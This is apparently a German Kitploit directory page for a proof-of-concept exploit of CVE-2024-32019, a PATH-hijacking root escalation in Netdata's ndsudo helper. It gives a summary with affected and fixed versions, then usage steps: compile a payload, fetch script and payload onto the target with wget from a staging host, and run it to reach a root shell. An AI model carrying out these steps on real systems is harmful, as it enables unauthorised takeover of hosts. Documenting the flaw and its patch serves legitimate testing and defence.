Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-32019-Netdata-ndsudo-Privilege-Escalation-PoC — Netdata ndsudo Privilegieneskalation PoC | Kitploit
Tools/GitHubGitHub/t1erno/cve-2024-32019-netdata-ndsudo-privilege-escalation-poc
Privilege EscalationSchwachstellenanalyseExploitationPost-ExploitationPenetrationstestsRed Teaming
GitHubt1erno/cve-2024-32019-netdata-ndsudo-privilege-escalation-poc

CVE-2024-32019-Netdata-ndsudo-Privilege-Escalation-PoC

Netdata ndsudo Privilegieneskalation PoC

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
31vor 0 JahrenNoch nicht geprüft

CVE-2024-32019 Netdata ndsudo Privilegieneskalation PoC

Zusammenfassung

CVE-2024-32019 ist eine lokale Schwachstelle zur Privilegieneskalation im SUID-Helfer ndsudo von Netdata, die es einem lokalen Benutzer ermöglicht, beliebige Programme als root über einen nicht vertrauenswürdigen Suchpfad auszuführen (PATH-Hijacking).

Das Problem besteht darin, dass ndsudo die Befehlsnamen einschränkt, sie jedoch mithilfe des PATH des Aufrufers auflöst, sodass ein Benutzer eine schädliche Binärdatei weiter vorne im PATH platzieren und von ndsudo mit Root-Rechten ausführen lassen kann.

Betroffen sind Netdata Agent-Versionen ≥ v1.45.0 und < v1.45.3 sowie ≥ v1.44.0-60 und < v1.45.0-169; der CVSS-v3.1-Score beträgt 8.8 (Hoch).

Zur Behebung sollte auf v1.45.3 oder v1.45.0-169 aktualisiert werden; die Schwachstelle wird CWE-426 (Untrusted Search Path) zugeordnet.

Verwendung

  1. Kompilieren Sie den Payload oder erstellen Sie einen eigenen.
root@kitploit:~
gcc -static payload.c -o nvme -Wall -Werror -Wpedantic
  1. Laden Sie Skript und Payload auf den Zielrechner hoch.
root@kitploit:~
test@ubuntu:/tmp$ wget http://192.168.100.7:8000/CVE-2024-32019.sh
--2025-09-10 23:49:01--  http://192.168.100.7:8000/CVE-2024-32019.sh
Connecting to 192.168.100.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 712 [application/x-sh]
Saving to: ‘CVE-2024-32019.sh’

CVE-2024-32019.sh                                    100%[==================================================>]     712  --.-KB/s    in 0s

2025-09-10 23:49:01 (57.1 MB/s) - ‘CVE-2024-32019.sh’ saved [712/712]

test@ubuntu:/tmp$ wget http://192.168.100.7:8000/nvme
--2025-09-10 23:49:10--  http://192.168.100.7:8000/nvme
Connecting to 192.168.100.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 832552 (813K) [application/octet-stream]
Saving to: ‘nvme’

nvme                                                 100%[==================================================>] 813.04K  1.98MB/s    in 0.4s

2025-09-10 23:49:11 (1.98 MB/s) - ‘nvme’ saved [832552/832552]
  1. Führen Sie den PoC aus.
root@kitploit:~
test@ubuntu:/tmp$ sh CVE-2024-32019.sh
[+] ndsudo found at: /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
[+] File 'nvme' found in the current directory.
[+] Execution permissions granted to ./nvme
[+] Running ndsudo with modified PATH:
root@ubuntu:/tmp#

Quellen:

  • https://www.rapid7.com/db/modules/exploit/linux/local/ndsudo_cve_2024_32019/
  • https://www.wiz.io/vulnerability-database/cve/cve-2024-32019
  • https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
Tool herunterladen